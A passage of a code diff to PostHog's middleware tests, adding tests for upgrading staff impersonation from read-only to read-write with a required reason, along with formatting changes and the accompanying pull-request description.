+        self,
+    ):
         """Verify read-only impersonation blocks PATCH with set_current_organization plus other fields."""
         self.login_as_other_user_read_only()
 
         response = self.client.patch(
             "/api/users/@me/",
-            data={"set_current_organization": str(self.organization.id), "first_name": "Hacked"},
+            data={
+                "set_current_organization": str(self.organization.id),
+                "first_name": "Hacked",
+            },
             content_type="application/json",
         )
 
@@ -915,7 +948,10 @@ class TestImpersonationBlockedPathsMiddleware(APIBaseTest):
 
         response = self.client.patch(
             "/api/users/@me/",
-            data={"set_current_organization": str(self.organization.id), "first_name": "Hacked"},
+            data={
+                "set_current_organization": str(self.organization.id),
+                "first_name": "Hacked",
+            },
             content_type="application/json",
         )
 
@@ -1013,6 +1049,94 @@ class TestImpersonationLoginReasonRequired(APIBaseTest):
         assert self.client.get("/api/users/@me/").json()["email"] == self.user.email
 
 
+class TestUpgradeImpersonation(APIBaseTest):
+    other_user: User
+
+    def setUp(self):
+        super().setUp()
+        self.other_user = User.objects.create_and_join(
+            self.organization, email="other-user@posthog.com", password="123456"
+        )
+        self.user.is_staff = True
+        self.user.save()
+
+        self.client = DjangoClient()
+        self.client.force_login(self.user)
+
+    def login_as_read_only(self):
+        return self.client.post(
+            reverse("loginas-user-login", kwargs={"user_id": self.other_user.id}),
+            data={"read_only": "true", "reason": "Initial read-only impersonation"},
+            follow=True,
+        )
+
+    def login_as_read_write(self):
+        return self.client.post(
+            reverse("loginas-user-login", kwargs={"user_id": self.other_user.id}),
+            data={"read_only": "false", "reason": "Initial read-write impersonation"},
+            follow=True,
+        )
+
+    def test_upgrade_succeeds_from_read_only_with_reason(self):
+        self.login_as_read_only()
+
+        # Verify we're in read-only mode
+        user_response = self.client.get("/api/users/@me/")
+        assert user_response.json()["is_impersonated_read_only"] is True
+
+        # Upgrade to read-write
+        response = self.client.post(
+            reverse("impersonation-upgrade"),
+            data=json.dumps({"reason": "Need to make changes for support ticket #5678"}),
+            content_type="application/json",
+        )
+        assert response.status_code == 200
+        assert response.json()["success"] is True
+
+        # Verify we're now in read-write mode
+        user_response = self.client.get("/api/users/@me/")
+        assert user_response.json()["is_impersonated_read_only"] is False
+
+    def test_upgrade_returns_404_when_not_impersonated(self):
+        response = self.client.post(
+            reverse("impersonation-upgrade"),
+            data=json.dumps({"reason": "Some reason"}),
+            content_type="application/json",
+        )
+        assert response.status_code == 404
+
+    def test_upgrade_returns_404_when_already_read_write(self):
+        self.login_as_read_write()
+
+        response = self.client.post(
+            reverse("impersonation-upgrade"),
+            data=json.dumps({"reason": "Some reason"}),
+            content_type="application/json",
+        )
+        assert response.status_code == 404
+
+    def test_upgrade_returns_400_without_reason(self):
+        self.login_as_read_only()
+
+        response = self.client.post(
+            reverse("impersonation-upgrade"),
+            data=json.dumps({}),
+            content_type="application/json",
+        )
+        assert response.status_code == 400
+        assert "reason" in response.json()["error"].lower()
+
+    def test_upgrade_returns_400_with_empty_reason(self):
+        self.login_as_read_only()
+
+        response = self.client.post(
+            reverse("impersonation-upgrade"),
+            data=json.dumps({"reason": "   "}),
+            content_type="application/json",
+        )
+        assert response.status_code == 400
+
+
 @override_settings(SESSION_COOKIE_AGE=100)
 class TestSessionAgeMiddleware(APIBaseTest):
     def setUp(self):
@@ -1036,7 +1160,10 @@ class TestSessionAgeMiddleware(APIBaseTest):
         # Initial request sets session creation time
         response = self.client.get("/")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(self.client.session.get(settings.SESSION_COOKIE_CREATED_AT_KEY), 1704110400.0)
+        self.assertEqual(
+            self.client.session.get(settings.SESSION_COOKIE_CREATED_AT_KEY),
+            1704110400.0,
+        )
 
         # Move forward 99 seconds (before timeout)
         mock_time.return_value = 1704110499.0  # 2024-01-01 12:01:39
@@ -1049,7 +1176,10 @@ class TestSessionAgeMiddleware(APIBaseTest):
         # Initial request sets session creation time
         response = self.client.get("/")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(self.client.session.get(settings.SESSION_COOKIE_CREATED_AT_KEY), 1704110400.0)
+        self.assertEqual(
+            self.client.session.get(settings.SESSION_COOKIE_CREATED_AT_KEY),
+            1704110400.0,
+        )
 
         # Move forward past total session age (101 seconds)
         mock_time.return_value = 1704110501.0  # 2024-01-01 12:01:41
@@ -1057,7 +1187,8 @@ class TestSessionAgeMiddleware(APIBaseTest):
         # Should redirect to login
         self.assertEqual(response.status_code, 302)
         self.assertEqual(
-            response.headers["Location"], "/login?message=Your%20session%20has%20expired.%20Please%20log%20in%20again."
+            response.headers["Location"],
+            "/login?message=Your%20session%20has%20expired.%20Please%20log%20in%20again.",
         )
 
     @freeze_time("2024-01-01 12:00:00")
@@ -1069,7 +1200,10 @@ class TestSessionAgeMiddleware(APIBaseTest):
         # Initial request sets session creation time
         response = self.client.get("/")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(self.client.session.get(settings.SESSION_COOKIE_CREATED_AT_KEY), 1704110400.0)
+        self.assertEqual(
+            self.client.session.get(settings.SESSION_COOKIE_CREATED_AT_KEY),
+            1704110400.0,
+        )
 
         # Move forward past org timeout (51 seconds)
         mock_time.return_value = 1704110451.0  # 2024-01-01 12:00:51
@@ -1077,7 +1211,8 @@ class TestSessionAgeMiddleware(APIBaseTest):
         # Should redirect to login
         self.assertEqual(response.status_code, 302)
         self.assertEqual(
-            response.headers["Location"], "/login?message=Your%20session%20has%20expired.%20Please%20log%20in%20again."
+            response.headers["Location"],
+            "/login?message=Your%20session%20has%20expired.%20Please%20log%20in%20again.",
         )
 
     @freeze_time("2024-01-01 12:00:00")
@@ -1095,7 +1230,10 @@ class TestSessionAgeMiddleware(APIBaseTest):
         # Initial request sets session creation time
         response = self.client.get("/")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(self.client.session.get(settings.SESSION_COOKIE_CREATED_AT_KEY), 1704110400.0)
+        self.assertEqual(
+            self.client.session.get(settings.SESSION_COOKIE_CREATED_AT_KEY),
+            1704110400.0,
+        )
 
         # Switch to other team
         self.user.team = other_team
@@ -1113,7 +1251,8 @@ class TestSessionAgeMiddleware(APIBaseTest):
         response = self.client.get("/")
         self.assertEqual(response.status_code, 302)
         self.assertEqual(
-            response.headers["Location"], "/login?message=Your%20session%20has%20expired.%20Please%20log%20in%20again."
+            response.headers["Location"],
+            "/login?message=Your%20session%20has%20expired.%20Please%20log%20in%20again.",
         )
 
 

--- a/posthog/test/test_middleware.py
+++ b/posthog/test/test_middleware.py
@@ -1060,7 +1060,7 @@ class TestUpgradeImpersonation(APIBaseTest):
         self.user.is_staff = True
         self.user.save()
 
-        self.client = DjangoClient()
+        self.client = DjangoClient()  # type: ignore[assignment]
         self.client.force_login(self.user)
 
     def login_as_read_only(self):


### PR DESCRIPTION
This is one of three PRs
- Part 1 - https://github.com/PostHog/posthog/pull/45012
- Part 2 (this PR)
- Part 3 - https://github.com/PostHog/posthog/pull/45112

## Problem

It's quite common now to want to grab write permissions while impersonated - but it's painful to logout and login again.

## Changes

Allow impersonation 'upgrades' to read-write. The UI is (hopefully!) subtle so we don't encourage this or make it too easy, and it reuses the impersonation modal we already built - requiring a reason for the upgrade.

https://github.com/user-attachments/assets/c6cc7526-317e-450c-b07f-0b6c251585b9

## How did you test this code?

Tested locally + added tests for the backend logic.